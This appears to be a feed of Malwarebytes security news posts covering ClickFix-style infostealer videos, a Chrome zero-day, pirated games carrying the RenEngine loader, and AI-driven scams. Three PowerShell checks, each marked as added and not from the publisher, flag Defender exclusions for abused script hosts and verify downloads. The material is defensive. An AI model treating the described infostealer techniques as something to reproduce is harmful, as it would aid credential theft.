Malware Bytes Security


Children’s phones must block nude images by September, UK says

Thu, 06/11/2026 - 6:55am

Build something that doesn’t exist. Don’t collect any data while you do it. Get it wrong and the CEO could face criminal charges. That’s close to the ultimatum the UK government handed Apple and Google on June 8. The two companies have three months to introduce device-level protections blocking nudity across every smartphone and tablet sold in the UK. If they don’t, the government will legislate—including fines and, as a last resort, criminal liability for tech bosses.

Prime Minister Keir Starmer announced the move at London Tech Week, telling the firms:

“If they choose not to, then we will act and change the law.”

The policy reads cleanly. The execution doesn’t.

What’s already on your child’s phone, and what isn’t

Both companies already do something to prevent children interacting with nudes. Apple’s Communication Safety feature warns children with a Child Account when they send or receive images and videos containing nudity across Messages, AirDrop, FaceTime, and other apps. It updated the feature with new functionality at its Worldwide Developer Conference (WWDC) this week.

Google’s Sensitive Content Warnings blur sensitive imagery in Google Messages for supervised users and signed-in unsupervised teens—though the feature covers images only, not video.

Apple will soon require people to confirm that they are over 18 in the UK and some other countries to access certain features on their phones. That will involve age assurance through government ID, payment information, or other verification methods depending on region.

These measures aren’t enough, according to the UK government. It complains that existing nudity detection isn’t applied to the camera or other apps, third-party messaging services, or search functions. So in other words, the protections miss most of the phone. The camera, WhatsApp, Signal, Safari, and the photo library all sit outside the protective bubble parents may assume already exists.

Is privacy-respecting scanning possible?

The announcement also contains a line that’s hard to reconcile with the rest of it:

“Companies must introduce these measures without threatening privacy or collecting any data.”

Adults can opt out, but only by completing age verification.

That’s a tall order. Privacy advocates argue that age verification inevitably creates new data collection risks, even when companies try to minimize the information they store. Whatever Apple and Google build, some form of record-keeping seems likely. If executives can face personal liability for non-compliance, someone has to be able to demonstrate what the system did and when.

The government’s proof that any of this is achievable rests on a single product: SafeToNet’s HarmBlock, which the Home Office calls “a proven example” of safe-by-default device protection. HarmBlock’s source code (which isn’t public) analyzes images and live streams entirely on-device.

Digital privacy groups were not happy with the announcement. Big Brother Watch pointed out that children could easily access adult-registered devices, and warned that mandatory ID checks for adults would mean “the death of anonymity and internet privacy.”

Private messaging app Signal said promises the scanning would run only on-device were “cold comfort” because wherever the system runs, its reach would ultimately be determined by government, not technology:

“Its scope will be defined by the whims and proscriptions of the government to detect nudity today and political speech tomorrow.”

Apple has been here before. In 2021, it announced a separate plan to detect known child sexual abuse imagery on devices by matching image hashes against a database of known material, and quietly shelved it after sustained backlash from privacy advocates.

What families can do today

September will end in voluntary compliance or hurried legislation. Either way, none of that changes what’s on your child’s phone right now. Today, the messaging channels most heavily used by teenagers aren’t protected. Many grooming and sextortion cases begin on apps that operate outside the operating system’s built-in safety features. Parents and kids can take extra steps for protection:

  • Turn on Communication Safety on iPhones with a Child Account, and Sensitive Content Warnings on supervised Android Messages. They might only blunt the problem at one narrow point, but it’s better than nothing.
  • Talk to your kids about coerced sharing. The Internet Watch Foundation reported that 91% of reports it assessed in 2024 contained self-generated content submitted by children themselves. Children are often coerced into sending explicit material to abusers online. The Internet Watch Foundation has a list of resources for people who are being coerced into sending intimate images online.
  • Cover the basics that outlive any policy: put unique passwords on all accounts, and add multi-factor authentication.
  • Be careful when sharing images of children you know online. Increasingly, criminals can use non-explicit images to create sexual content using AI that can in turn be used for extortion.

Categories: Malware Bytes

Free Spotify Premium hacks on social media are spreading infostealers

Wed, 06/10/2026 - 12:27pm

Short-form video platforms like TikTok and Instagram Reels have become the latest way cybercriminals spread malware.

We’ve already seen attackers move away from traditional phishing emails and toward tactics that trick people into installing malware themselves. Now they’re being lured with slick social media videos that promise free Spotify Premium, free Windows activation, or free Microsoft Office, but instead leave people with infostealers on their Windows devices.

Researchers at ReversingLabs uncovered two active campaigns that use short videos to trick users into running dangerous PowerShell commands or visiting malicious download sites. Similar campaigns have been reported by other researchers and national cybersecurity agencies, suggesting a growing trend: Cybercriminals are learning how to use social media algorithms just as effectively as marketers.

In true social media fashion, the videos on platforms like TikTok and Instagram Reels claim to solve a problem you didn’t know you had. The catch is that following the instructions delivers malware to your device.

How the scam works

The first campaign looks deceptively professional.

Accounts with names like “windows.tips” or “windows.insights” use Windows-style branding and post polished tutorial videos that resemble genuine tech support content. The videos are tagged with Windows and Office-related keywords so they appear alongside legitimate troubleshooting and tips content.

The videos promise to unlock Spotify Premium, Microsoft Office, or Windows for free. Viewers are then guided through step-by-step instructions that include opening PowerShell, a legitimate Windows admin tool, and pasting in commands. Those commands download and run malware, much like the ClickFix scams we’ve covered before.

The malware was identified as Vidar, an infostealer designed to steal sensitive information from infected devices. Vidar commonly targets:

  • Saved browser passwords
  • Autofill data
  • Browser cookies
  • Cryptocurrency wallets
  • Two-factor authentication (2FA) data
  • TOR browser data

The stolen information is then sent back to servers controlled by the attackers.

How to stay safe

Research into similar TikTok-based attacks shows these scripts commonly add exclusions to Windows Defender, making it harder for security software to detect future malicious activity.
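
Because these scripts commonly leave Defender exclusions behind, listing the current exclusions is a quick check after someone has pasted a command from a video. The script below is an added example, not code from Malwarebytes or ReversingLabs; the function name and the "risky" patterns are assumptions chosen for illustration, while `Get-MpPreference` and its exclusion properties are standard Defender cmdlet output.

```powershell
# Added example: list Microsoft Defender exclusions and flag the ones that let
# user-writable locations, executable file types or script hosts go unscanned.
# The patterns are illustrative assumptions, not an official indicator list.

function Get-DefenderExclusionFinding {
    [CmdletBinding()]
    param(
        # Defaults to the live configuration; pass a saved object to review offline.
        $Preference = (Get-MpPreference)
    )

    # Regex -> reason. A pasted script running as the user can write to all of these.
    $riskyPaths = [ordered]@{
        '^[A-Za-z]:\\?$'      = 'entire drive excluded'
        '\\Users(\\|$)'       = 'inside a user profile (Desktop, Downloads, AppData)'
        '\\ProgramData(\\|$)' = 'ProgramData is writable by standard users'
        '\\Temp(\\|$)'        = 'temporary folder'
    }
    $riskyExtensions = 'exe', 'dll', 'scr', 'msi', 'ps1', 'bat', 'cmd', 'vbs', 'js'
    $scriptHosts     = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe',
                       'cscript.exe', 'mshta.exe', 'rundll32.exe'

    # Without elevation, recent Windows builds return an "N/A: ..." string
    # instead of the real exclusion list.
    $all = @($Preference.ExclusionPath) + @($Preference.ExclusionExtension) +
           @($Preference.ExclusionProcess)
    if ($all -like 'N/A:*') {
        Write-Warning 'Exclusions are hidden from non-administrators. Run this from an elevated prompt.'
        return
    }

    foreach ($path in $Preference.ExclusionPath) {
        foreach ($rule in $riskyPaths.GetEnumerator()) {
            if ($path -match $rule.Key) {
                [pscustomobject]@{ Type = 'Path'; Value = $path; Reason = $rule.Value }
                break
            }
        }
    }

    foreach ($ext in $Preference.ExclusionExtension) {
        # Entries may be stored as "exe", ".exe" or "*.exe".
        if ($riskyExtensions -contains ($ext -replace '^[*.]+', '')) {
            [pscustomobject]@{ Type = 'Extension'; Value = $ext; Reason = 'executable or script file type' }
        }
    }

    foreach ($proc in $Preference.ExclusionProcess) {
        # A process exclusion stops scanning of files that process opens.
        if ($scriptHosts -contains (Split-Path -Path $proc -Leaf)) {
            [pscustomobject]@{ Type = 'Process'; Value = $proc; Reason = 'script host or command interpreter' }
        }
    }
}

Get-DefenderExclusionFinding | Format-Table -AutoSize -Wrap
```

An entry you did not create can be removed from an elevated prompt with `Remove-MpPreference` (for example, its `-ExclusionPath` parameter), followed by a full scan.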

Fortunately, there are a few simple ways to protect yourself:

  • Only download software from official vendor websites.  
  • Be skeptical of “free”, cracked, or unofficial versions of paid software. 
  • Don’t follow instructions on a webpage without thinking them through, especially if the page asks you to run commands on your device or copy and paste code. Many ClickFix pages use countdowns, fake user counters, or other pressure tactics to make you act quickly.
  • Check that downloaded files match what you expected to download.
  • Verify a file’s publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. 
  • Use a real-time, up-to-date anti-malware solution to block malware like infostealers before it runs.
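
The file checks in the list above can also be scripted. This is an added example, not Malwarebytes code; the function name `Test-DownloadedFile`, its parameters and the extension lists are assumptions, and it uses the built-in `Get-AuthenticodeSignature` and `Get-FileHash` cmdlets.

```powershell
# Added example: the "Properties > Digital Signatures" check as a script, plus
# a hash comparison, a deceptive-name check and the browser's download marker.

function Test-DownloadedFile {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string] $ExpectedSha256,     # value published by the vendor, if any
        [string] $ExpectedPublisher   # name you expect in the signing certificate
    )

    $file  = Get-Item -LiteralPath $Path -ErrorAction Stop
    $sig   = Get-AuthenticodeSignature -LiteralPath $file.FullName
    $hash  = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
    $flags = [System.Collections.Generic.List[string]]::new()

    # NotSigned, HashMismatch, NotTrusted ...: anything other than Valid is a red flag.
    if ($sig.Status -ne 'Valid') {
        $flags.Add("signature status is $($sig.Status)")
    }

    # Subject is empty for unsigned files, which also fails this comparison.
    $signer = $sig.SignerCertificate.Subject
    if ($ExpectedPublisher -and $signer -notlike "*$ExpectedPublisher*") {
        $flags.Add("signer does not mention '$ExpectedPublisher'")
    }

    # String comparison is case-insensitive, so upper- or lower-case hex both work.
    if ($ExpectedSha256 -and $hash -ne $ExpectedSha256.Trim()) {
        $flags.Add('SHA-256 differs from the published value')
    }

    # "track.mp3.exe", "invoice.pdf.scr": a media or document name hiding a program.
    $doubleExt = '\.(pdf|docx?|xlsx?|jpe?g|png|mp[34]|txt|zip)\.(exe|scr|com|bat|cmd|ps1|vbs|js|lnk)$'
    if ($file.Name -match $doubleExt) {
        $flags.Add('double extension hides an executable type')
    }

    # Browsers record the download zone in the Zone.Identifier stream (NTFS only).
    $motw = Get-Content -LiteralPath $file.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue

    [pscustomobject]@{
        File            = $file.Name
        Sha256          = $hash
        SignatureStatus = $sig.Status
        Signer          = $signer
        FromInternet    = [bool](@($motw) -match 'ZoneId=3')
        RedFlags        = $flags -join '; '
    }
}

# Stand-in target so the example runs anywhere: the PowerShell host itself.
# Replace with the file you downloaded and the publisher you expect.
Test-DownloadedFile -Path (Get-Process -Id $PID).Path -ExpectedPublisher 'Microsoft' |
    Format-List
```

An empty `RedFlags` field means none of these checks failed; as the list says, a valid signature on its own does not make a file safe.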

Pro tip: If you’re unsure whether a video, message, or website is legitimate, you can ask Malwarebytes Scam Guard about it. It can help identify suspicious content and advise you on what to do next.


Microsoft’s biggest-ever Patch Tuesday fixes 206 bugs, including 3 zero-days

Wed, 06/10/2026 - 8:43am

This month’s Patch Tuesday remedies 206 Microsoft security vulnerabilities, which makes it the biggest ever.

The fixes include 32 vulnerabilities marked as critical by Microsoft, including three publicly disclosed zero-day vulnerabilities. Microsoft classifies these as zero-days because details were publicly disclosed before patches became available. None are known to have been actively exploited in the wild.

The sheer number of fixed CVEs (vulnerabilities) makes this the largest release since the Patch Tuesday program began. Microsoft formalized Patch Tuesday in October 2003, after the Blaster worm prompted a move to a regular monthly update cycle.

Technical details

One publicly disclosed vulnerability is important to mention. This flaw in Windows BitLocker is tracked as CVE-2026-50507 (CVSS score: 6.8 out of 10) and its description states:

“protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack.”

BitLocker is a built-in Windows security feature that encrypts your entire hard drive, securing your data from unauthorized access if your device is lost or stolen. However, this vulnerability could allow an attacker with physical access to bypass BitLocker Device Encryption and gain access to encrypted data. As Microsoft notes, a successful attacker could bypass the BitLocker Device Encryption feature on the system storage device.

Another is CVE-2026-49160 (CVSS score: 7.5 out of 10) in HTTP.sys. This vulnerability can be exploited to launch a remote denial-of-service attack against major web servers using a technique called HTTP/2 Bomb.

The third to discuss is CVE-2026-45586 (CVSS score: 7.8 out of 10) in the Windows Collaborative Translation Framework (CTFMON). An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. These elevation of privilege (EoP) vulnerabilities are especially valuable to attackers because they can be combined with other flaws to gain full control of a compromised system.

How to apply fixes and check if you’re protected

These updates fix security problems and keep your Windows PC protected. Here’s how to make sure you’re up to date:

1. Open Settings

  • Click the Start button (the Windows logo at the bottom left of your screen).
  • Click on Settings (it looks like a little gear).

2. Go to Windows Update

  • In the Settings window, select Windows Update (usually at the bottom of the menu on the left).

3. Check for updates

  • Click the button that says Check for updates.
  • Windows will search for the latest Patch Tuesday updates.
  • If you have selected to get the latest updates as soon as they’re available (this setting appears under More options), you may see a Restart required message. Restart your system and the update will complete.
  • If not, continue with the steps below.

4. Download and install

  • If updates are found, they’ll start downloading automatically. Once complete, you’ll see a button that says Install or Restart now.
  • Click Install if needed and follow any prompts. Your computer will usually need a restart to finish the update. If it does, click Restart now.

5. Double-check you’re up to date

  • After restarting, go back to Windows Update and check again. If it says You’re up to date, you’re all set!


88% of people struggle to tell what’s real online

Wed, 06/10/2026 - 7:45am

What would you trade for a technology that can do almost anything? For many people, the answer is clear: Everything they thought they could trust.

In a few short years, Artificial Intelligence (AI) tools have granted people unfettered access to easier writing, faster image generation, quicker coding, and near-instantaneous answers, advice, and information—advantages they value and want. But the same tools that can spruce up a dating profile or reimagine an old photograph can also manipulate the broader world online, and people are noticing.

According to new research from Malwarebytes, 88% of people said it’s becoming harder to tell what content online is genuinely human or real, with 84% saying that “convincing video evidence” no longer feels like proof. Further, 85% said it can be hard to tell scams apart from the real thing—a major uptick from the 66% who said the same thing last year.

These are the first signs of AI’s counterfeit world. Replete with fake websites, fake products, fake videos, fake pictures, fake voices, and even fake people, it is threatening to swallow the web.

The latest report from Malwarebytes, Face value: How AI is reshaping trust, identity, and scams, exposes the hidden cost of AI on the public: an excess of fraud that is dismantling trust in reality and in one another.

The damage arrives in large moments and small, from the US parent who said they “received a voicemail that sounded exactly like my son’s voice, saying he was in trouble and needed money for legal fees,” to the two entirely unrelated respondents fooled by the same AI-generated video of rabbits bouncing on a trampoline, to the individual worried about “my grandfather showing me AI slop and he thought it was real.”

For this research, Malwarebytes surveyed 1,500 adults aged 18 and older across the US, UK, Austria, Germany, and Switzerland about their uses, feelings, and concerns regarding AI. The sample was equally split for gender with a spread of ages, geographical regions, and race groups, and weighted to provide a balanced view.

The complete findings can be found in the full report.

Here are some of the key takeaways and findings:

  • 88% said it’s becoming harder to tell what content online is genuinely human or real
  • 84% said convincing video evidence no longer feels like proof 
  • 85% of people said it’s hard to tell a scam from the real thing (up from 66% last year)
  • 50% have experienced some form of AI fraud or scam, such as being misled by AI-generated photos of products or receiving a highly personalized scam message
  • 19% have specifically experienced some form of AI-driven identity harm, including the 10% who have had someone use AI to generate sexually explicit content of them without permission
  • 81% fear someone stealing their family’s likeness, yet only 13% have created a family codeword to guard against it
  • 67% worry about voice cloning, yet only 19% have turned off voicemail recordings to prevent it
  • 45% say it’s okay to use AI for personal emotional tasks (like writing wedding vows or a eulogy)
  • 34% say it’s okay to use AI to help create or improve a dating profile
  • One in three self-avowed daily users of AI said it’s okay to generate explicit images of someone without their consent 

Defeat would be the wrong lesson to take from all this. It is true now that the internet requires assistance, but there are plenty of safe places to seek help.

While Malwarebytes works to provide new tools, we’d like to remind both the AI anxious and the eager about the first rule of the internet: Remember the human. People’s voices, bodies, choices, and agency belong to them and them alone. 

As for every fake video, product, website, and image, understand that there’s help. No one needs to navigate an artificial internet alone. Whether through scam detection, identity protection, or simple awareness, people have more options than they may realize.


Meta’s face-recognition code raises new concerns about smart glasses

Tue, 06/09/2026 - 9:57am

Meta’s smart glasses are once again at the center of a privacy debate due to face recognition.

WIRED reports that Meta had quietly embedded unreleased face-recognition code, internally called “NameTag,” into its Meta AI companion app, which powers the company’s smart glasses. The code was not active, but its presence in an app installed on more than 50 million devices raised immediate concerns about how quickly using smart glasses could slide into biometric surveillance.

Face recognition in glasses, even if disabled or unreleased, is especially sensitive because it can identify people at a distance, in real time, and without their consent. Many organizations have warned that this technology could be misused by stalkers, abusers, and others who want to identify people in public without drawing attention.

Gizmodo reports on a proposed Pennsylvania bill that would require smart glasses and similar wearable recording devices to include a visible indicator light when they are capturing audio or video. The bill would also prohibit users from disabling that indicator, a move clearly aimed at reducing covert recording in public spaces.

Most smart glasses already include such an indicator, but reporters noted that some users have been paying others to have them removed or disabled. The proposal is interesting because it tries to solve a hardware-level trust problem with a visible signal. But a visible light only helps if it is both mandatory and difficult to bypass, and history suggests that any visible privacy safeguard becomes a target for tampering when the incentives are high enough.

These two stories are really about the same issue: smart glasses are normalizing the use of always-on cameras, microphones, and AI features in a form that is much easier to conceal than a phone. That creates an unwanted privacy problem for people around the wearer.

Smart glasses are supposed to make computing more seamless. Instead, they are becoming a test case for what happens when cameras, microphones, AI, and biometric features are squeezed into everyday wearables before the privacy rules catch up.

From our point of view, smart glasses sit at the intersection of consumer privacy, surveillance tech, and potential abuse. The risk is not just that a device records audio or video. AI-enabled wearables can process what they see, deduce identities, and potentially store biometric data in ways that ordinary users and bystanders can’t easily detect.

We’d rather err on the side of caution and use an app that can detect when smart glasses are nearby. Unfortunately, it only detects some devices, and we don’t yet know how well it will perform if smart glasses become more common.

As noted by 404 Media, the app is an imperfect, tech-based response to a social and legal problem: it can misfire, it can’t tell you who is being recorded, and it risks giving a false sense of safety. The developer frames it not as a solution but as a small, user-controlled countermeasure in an environment where surveillance devices are becoming less visible and more AI-enabled.

Don’t get recognized

If facial recognition features ever become common in smart glasses, much of their effectiveness will depend on how much information about you is already available online. There are a few steps you can take today to reduce your visibility in facial recognition systems and people-search databases.

A major factor is limiting who can see the photographs you post on social media and other online platforms. But there is more you can do:

Remove yourself from reverse face search engines

The major, most accurate reverse face search engines, PimEyes and Facecheck.id, offer opt-out and removal processes that can help reduce your visibility in search results.

Remove yourself from people search engines

Most people don’t realize how much information can be found from a name alone. People-search sites often aggregate home addresses, phone numbers, ages, and relatives from public records and commercial databases.

The New York Times has compiled a useful guide to many of the major people-search sites, along with instructions for opting out and removing your information.

Scrub your data

If you’re in the US, you can also use Malwarebytes Personal Data Remover to help find and remove personal information that data broker sites have collected about you.


Scammers love Meta, according to Lloyds Bank

Tue, 06/09/2026 - 9:02am

Scammers go phishing wherever the victims are. In the UK, that means Facebook, Instagram, and WhatsApp, according to Lloyds Bank. It just revealed that Meta platforms account for over two thirds of fraud reports made by its customers.

Writing in The Sunday Times, Lloyds Bank’s fraud prevention director Liz Ziegler said that 68% of fraud reports from its customers start on a Meta-owned platform.

The scams cover everything from fake concert tickets and sporting events to bogus listings for cars, bikes, campervans, mobility vehicles, and rental properties. Lloyds said customers reported losing an estimated £66 million a year after falling victim to scam ads on Meta platforms, up from £27 million in 2023.

The victim demographic isn’t who you’d guess. Lloyds says customers in their late twenties and early thirties—supposed digital natives—are reporting scams at the highest rates.

Lloyds isn’t alone in calling out the tech giant. In 2023, TSB reported that 80% of losses across its three biggest fraud categories began on Meta platforms.

Meta says it’s doing plenty

A Meta spokesperson told The Sunday Times the company:

“…removed over 159 million scam ads last year alone, 92% of which we took down before anyone reported them”.

In October 2024, Meta also launched the Fraud Intelligence Reciprocal Exchange to let UK banks share intelligence directly with the platform.

However, a Reuters investigation published in November 2025 reported that internal Meta documents estimated that roughly 10% of the company’s 2024 advertising revenue came from scam ads and ads for banned, illicit or low-quality goods and services. The documents also estimated that users were shown around 15 billion “higher risk” scam ads each day.

In March this year, Meta rolled out additional anti-scam tools across WhatsApp, Facebook, and Messenger.

The lawyers are circling

UK firms Richardson Hartley Law and Humphries Kerstetter are coordinating a group legal claim for victims who lost money after clicking ads on Facebook or Instagram.

Scammers’ use of Meta AI has also introduced a new dimension to legal arguments against the company. In the US, a federal judge in California refused to dismiss key claims in Bouck v. Meta and Forrest v. Meta, lawsuits brought by fraud victims who allege that scammers used Meta’s advertising and AI tools to create and optimize fraudulent ads. The plaintiffs argued that made the platform “a genuine co-conspirator in the creation of the offending content.” Meta denies wrongdoing, and the cases are ongoing.

Last month, Santa Clara County filed its own suit against Meta, citing leaked internal documents that allegedly show the company earned as much as $7 billion a year from so-called “high-risk” scam ads. The county also alleges that Meta built guardrails to prevent anti-scam measures from reducing advertising revenue too much.

Protect yourself

Even if social media companies do try their best to quash scam advertisers, they won’t catch them all. So it’s up to you to keep a watchful eye for potential fraudulent activity. Here are some tips:

  • Treat unsolicited social media ads as untrustworthy by default, especially ones promising hard-to-find tickets, eye-watering investment returns, or impossibly cheap goods.
  • Research the sellers. What else do they sell on the platform? Do they have an established profile?
  • Pay with a card or service that offers chargeback protection.
  • Never pay by bank transfer, cryptocurrency, gift card, or Friends and Family payment methods when buying from someone you don’t know.
  • Be especially wary when a Facebook or Instagram exchange tries to migrate to WhatsApp. That handoff to a private channel is a classic scammer move, taking the conversation away from public scrutiny and platform enforcement.
  • Remember that seeing an ad on a major platform isn’t an endorsement. Scammers routinely pay to place ads alongside legitimate businesses.

Update Chrome: Google patches actively exploited vulnerability and 73 others

Tue, 06/09/2026 - 6:50am

Google has issued updates for the Chrome browser, patching a number of high‑severity vulnerabilities. 

The update includes fixes for 74 vulnerabilities, including one that is being actively exploited in the wild.

The stable channel has been updated to 149.0.7827.102/.103 for Windows/Mac, and 149.0.7827.102 for Linux, which will roll out over the coming weeks.

How to update Chrome

If you don’t want to wait for the rollout to reach you, manually updating is easy.

The easiest option is to allow Chrome to update automatically. But you can end up lagging behind on updates if you never close your browser or if something goes wrong, such as an extension preventing the update.

To update manually, click the More menu (three dots), then go to Settings > About Chrome. If an update is available, Chrome will start downloading it automatically. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.


You can also find step-by-step instructions in our guide to how to update Chrome on every operating system.
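
On Windows, the same check can be run from PowerShell, which is useful when you look after more than one PC. This is an added example, not from Google or Malwarebytes; the function name is hypothetical, the install folders are Chrome's usual per-machine and per-user locations, and treating `new_chrome.exe` as a staged update waiting for a browser restart is an assumption based on how Chrome's Windows installer normally behaves.

```powershell
# Added example: compare the installed Chrome build with the fixed build named
# in this article (149.0.7827.102 on Windows) and spot an update that has been
# downloaded but is still waiting for the browser to restart.

function Get-ChromePatchStatus {
    [CmdletBinding()]
    param(
        [version] $MinimumVersion = '149.0.7827.102'
    )

    # Per-machine (64-bit and 32-bit) and per-user install roots.
    $roots = $env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:LOCALAPPDATA |
        Where-Object { $_ } | Select-Object -Unique

    foreach ($root in $roots) {
        $appDir = Join-Path $root 'Google\Chrome\Application'
        $exe    = Join-Path $appDir 'chrome.exe'
        if (-not (Test-Path -LiteralPath $exe)) { continue }

        $installed = [version](Get-Item -LiteralPath $exe).VersionInfo.ProductVersion

        # Assumption: while Chrome is open, the updater leaves the new build as
        # new_chrome.exe and swaps it in on the next browser restart.
        $staged    = $null
        $stagedExe = Join-Path $appDir 'new_chrome.exe'
        if (Test-Path -LiteralPath $stagedExe) {
            $staged = [version](Get-Item -LiteralPath $stagedExe).VersionInfo.ProductVersion
        }

        # Path can be empty for other users' processes when not elevated.
        $running = @(Get-Process -Name chrome -ErrorAction SilentlyContinue |
            Where-Object { $_.Path -eq $exe }).Count

        if ($installed -ge $MinimumVersion) {
            $status = 'Patched'
        } elseif ($staged -and $staged -ge $MinimumVersion) {
            $status = 'Restart Chrome to finish updating'
        } else {
            $status = 'Update needed'
        }

        [pscustomobject]@{
            InstallPath      = $exe
            Installed        = $installed
            Staged           = $staged
            RunningProcesses = $running
            Status           = $status
        }
    }
}

Get-ChromePatchStatus | Format-Table -AutoSize
```

No output means Chrome was not found in any of the usual locations.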

Technical details

The vulnerability that Google says is being exploited in the wild is tracked as CVE-2026-11645.

Google describes it as:

“Out of bounds read and write in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.”

This means the flaw is in Chrome’s V8 engine—the part of Chrome (and other Chromium-based browsers) that runs JavaScript.

Such a flaw allows a program to read or write outside the memory boundaries it is supposed to use, enabling attackers to manipulate other areas of memory allocated to more critical functions. Attackers may be able to place malicious code in memory and trick the system into running it.

In this case, the vulnerability could be triggered when V8 processes specially crafted HTML content, such as a malicious website.

The phrase “inside a sandbox” means the malicious code would run in a restricted, sealed-off environment rather than directly on your whole computer. An attacker’s code is constrained to the browser, which lowers the impact compared with code running outside the sandbox. However, attackers often chain multiple vulnerabilities together to achieve more serious compromises. So the phrase describes a limit on the immediate impact, not a reassurance that the bug is harmless.

The update also includes some new features, like the ability to sign PDF forms without using an extension.


Americans lost nearly $900 million to AI-powered scams, FBI says

Mon, 06/08/2026 - 11:02am

The 2025 Federal Bureau of Investigation (FBI) Internet Crime Report shows that Americans reported $893,346,472 in AI‑related scam losses.

Those losses stem from 22,364 AI-related complaints. And these figures represent only the reported losses, which may well be the proverbial tip of the iceberg.

The main drivers behind the rise in AI-powered scams are voice cloning, deepfake images and videos, and AI‑generated scripts. These tools have supercharged classic fraud schemes such as romance scams, kidnapping and extortion calls, fake influencers, and government impersonation.

Michael Machtinger, deputy assistant director of the FBI Cyber Division, told the Wall Street Journal:

“AI-created fraudulent communications can look very official and very legitimate to even the most trained individuals.”

The FBI and financial institutions recommend verifying identities via official contact channels. One of their biggest concerns is government impersonation scams, which have evolved from crude IRS gift‑card phone calls into sophisticated, multi‑channel operations that combine spoofed caller ID, stolen agency logos, and AI‑generated audio and video of public officials.

This report, and others like it, shows how AI is being weaponized to automate research on victims, generate convincing scripts, and create highly believable deepfake personas at scale.

AI is also increasingly used in business email compromise (BEC), romance scams, and impersonation fraud. In BEC cases involving AI, losses have already reached tens of millions of dollars for businesses alone.

For a broader look at why AI is simultaneously fueling scams like these and becoming indispensable to defending against them, see my article AI: Threat, tool, or both?

It explains how both defenders and criminals use AI to find vulnerabilities, and why security vendors increasingly rely on AI to process vast amounts of telemetry, detect anomalies, and keep pace with threats that “no longer move at human speed.”

How to stay safe

Consumer protection agencies have documented a growing list of the ways scammers are using AI to try to rip people off. The main problem is that we can no longer take it at face value that the person we’re talking to is who they claim to be.

Government agencies and financial institutions recommend that you:

  • Be skeptical of urgent payment demands, especially those involving cryptocurrency or gift cards
  • Limit the amount of voice and video content you share publicly, as it can be reused by scammers
  • Report incidents quickly to your bank(s) and IC3.gov

Pro tip: Malwarebytes Scam Guard can help you determine whether a message is a scam and guide you through the next steps.


Pirated PC games are delivering password-stealing malware

Mon, 06/08/2026 - 6:53am

A new Windows malware campaign hides inside pirated PC games and modified installers for franchises like Far Cry, Need for Speed, FIFA, and Assassin’s Creed.

Researchers estimate that more than 400,000 devices worldwide have been infected, with around 30,000 users in the US.

The infection method is simple and effective. Users are lured into installing a fully functional free game. While the cracked and repacked game appears to work, the malware installs silently in the background.

The strain is being called “RenEngine loader” and is sometimes referred to as Ren’Py because parts of the malicious code are embedded in a legitimate Ren’Py launcher used to run some visual novel games. When the launcher runs, it decompresses the game files and secretly starts the infection chain.

Ren’Py is a legitimate, open-source visual novel engine used by developers to make story-driven games with text, images, sound, and interactive choices. The malware in this case is not Ren’Py itself. Attackers are abusing the engine or its launcher as a delivery method to hide malicious code inside pirated game installs.

In practice, the primary infection vector is software piracy. Victims download cracked games or repacked installers from unofficial sites, then run what looks like a normal game launcher or setup file. In reality, they’re infecting their computer with a malware loader.

At the time of writing, this loader is trying to deliver an infostealer called ARC, which can grab saved browser passwords, cookies, cryptocurrency wallets, autofill data, system details, and clipboard contents.

But we’ve also seen other payloads being dropped, including Rhadamanthys stealer, Async Remote Access Trojan (RAT), and Backdoor.XWorm, which can expand the damage from credential theft to full remote control of the machine. That can mean account takeovers, financial fraud, crypto theft, and deeper compromise of personal or work data.

Worst of all, a user may not realize they are infected until usernames and passwords have been stolen or the machine starts behaving strangely. 

How to stay safe

The most important lesson here is that “free” cracked software is often a delivery mechanism for malware, not a bargain. Once a loader like this is on the machine, the real goal is usually to steal credentials or install a secondary payload that is more persistent and more damaging.

Some other general advice to stay safe:

  • Don’t download installers from unofficial sources.
  • Use real-time, up-to-date anti-malware protection to block loaders.
  • Keep your software up to date, especially Microsoft patches and other security-related programs.

If you think your computer is infected and want to make sure, follow the instructions posted here. The amazing volunteers on our forums will help you through the process of cleaning your machine.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

AI: Threat, tool, or both?

Fri, 06/05/2026 - 4:56am

Public attitudes toward Artificial Intelligence (AI) are changing, and we wanted to understand why.

A recent Pew Research survey found that about half of adults say the increased use of AI in daily life makes them more concerned than excited, and that concern has grown over the last few years. People tend to worry most about long‑term social effects (jobs, creativity, relationships, misinformation), even while many do use AI tools and see some practical benefits, particularly for data analysis and routine tasks.

Data from an older UK survey already showed something similar. Awareness of highly visible AI technologies, such as driverless cars and facial recognition, is high, but awareness of AI in welfare assessments, loan decisions, or care services is much lower. Concern about many of these use cases has risen since 2022. In other words, people feel AI is everywhere, but don’t always understand where or how it’s being used, and that makes people cautious.

The concern is usually less about science‑fiction extinction scenarios and more about social and economic harm. People worry about their jobs disappearing, a loss of creativity, the spread of disinformation, and increased surveillance, more than about killer robot scenarios.

Research into public attitudes towards AI repeatedly finds that people hold conflicting views, shaped by narratives of admiration and hype on one side and threat and dystopia on the other.

They see genuine benefits in the technology, but are increasingly wary of how companies, governments, and criminals might use it. Basically, people aren’t scared of AI itself, but of who’s using it and for what purpose.

Cybersecurity

AI in cybersecurity is a special case. When asked in which field of AI research they would invest an unlimited amount of money, people chose the fields of medicine and cybersecurity.

People increasingly recognize that AI is now a tool used by both defenders and cybercriminals. Few would feel comfortable with defenders refusing to use AI while attackers continue to adopt it.

Security products use machine learning to process huge volumes of data, detect unusual behavior, prioritize alerts, and identify threats faster than human analysts could alone.

At the same time, cybercriminals are using AI to create more convincing phishing emails, clone voices, generate fake images and videos, automate research on victims, and develop malware that can evade traditional detection techniques.

Both sides use AI-assisted tools to find software vulnerabilities that could be exploited to defraud people or breach systems, so vendors want to patch them before cybercriminals exploit them.

